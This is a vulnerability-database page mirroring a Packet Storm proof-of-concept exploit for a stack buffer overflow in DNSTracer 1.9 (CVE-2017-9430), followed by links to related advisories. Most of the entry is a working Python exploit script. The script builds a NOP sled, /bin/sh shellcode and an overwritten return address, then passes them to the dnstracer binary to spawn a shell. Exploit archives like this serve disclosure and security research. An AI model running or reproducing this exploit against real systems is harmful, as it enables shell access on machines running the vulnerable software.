Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJ0lamaPACKETSTORM:143654
HistoryAug 04, 2017 - 12:00 a.m.

DNSTracer 1.9 Buffer Overflow

2017-08-0400:00:00
j0lama
packetstormsecurity.com
41

0.021 Low

EPSS

Percentile

89.1%

JSON
`# Exploit Title: DNSTracer 1.9 - Buffer Overflow  
# Google Dork: [if applicable]  
# Date: 03-08-2017  
# Exploit Author: j0lama  
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php  
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz  
# Version: 1.9  
# Tested on: Ubuntu 12.04  
# CVE : CVE-2017-9430  
# Bug report: https://www.exploit-db.com/exploits/42115/  
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php  
  
  
# Proof of Concept  
import os  
from subprocess import call  
  
def run():  
try:  
print "\nDNSTracer Stack-based Buffer Overflow"  
print "Author: j0lama"  
print "Tested with Dnstracer compile without buffer overflow protection"  
  
nops = "\x90"*1006  
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  
filling = "A"*24  
eip = "\x2f\xeb\xff\xbf"  
  
#buf size = 1057  
buf = nops + shellcode + filling + eip  
  
call(["./dnstracer", buf])  
  
except OSError as e:  
if e.errno == os.errno.ENOENT:  
print "\nDnstracer not found!\n"  
else:  
print "\nError executing exploit\n"  
raise  
  
  
if __name__ == '__main__':  
try:  
run()  
except Exception as e:  
print "Something went wrong"  
  
`

Related

packetstorm 1
exploitpack 2
ubuntucve 1
prion 1
nvd 1
cve 1
zdt 2
cvelist 1
debiancve 1
exploitdb 2
packetstorm
packetstorm
DNSTracer 1.8.1 Buffer Overflow
2017-06-05 00:00:00
exploitpack
exploitpack
DNSTracer 1.8.1 - Buffer Overflow (PoC)
2017-06-05 00:00:00
DNSTracer 1.9 - Local Buffer Overflow
2017-08-03 00:00:00
ubuntucve
ubuntucve
CVE-2017-9430
2017-06-05 00:00:00
prion
prion
Stack overflow
2017-06-05 11:29:00
nvd
nvd
CVE-2017-9430
2017-06-05 11:29:00
cve
cve
CVE-2017-9430
2017-06-05 11:29:00
zdt
zdt
DNSTracer 1.9 - Buffer Overflow Exploit
2017-08-03 00:00:00
DNSTracer 1.8.1 - Buffer Overflow Vulnerability
2017-06-05 00:00:00
cvelist
cvelist
CVE-2017-9430
2017-06-05 11:12:00
debiancve
debiancve
CVE-2017-9430
2017-06-05 11:29:00
exploitdb
exploitdb
DNSTracer 1.8.1 - Buffer Overflow (PoC)
2017-06-05 00:00:00
DNSTracer 1.9 - Local Buffer Overflow
2017-08-03 00:00:00

0.021 Low

EPSS

Percentile

89.1%

JSON
Related for PACKETSTORM:143654
packetstorm1exploitpack2ubuntucve1prion1nvd1cve1zdt2cvelist1debiancve1exploitdb2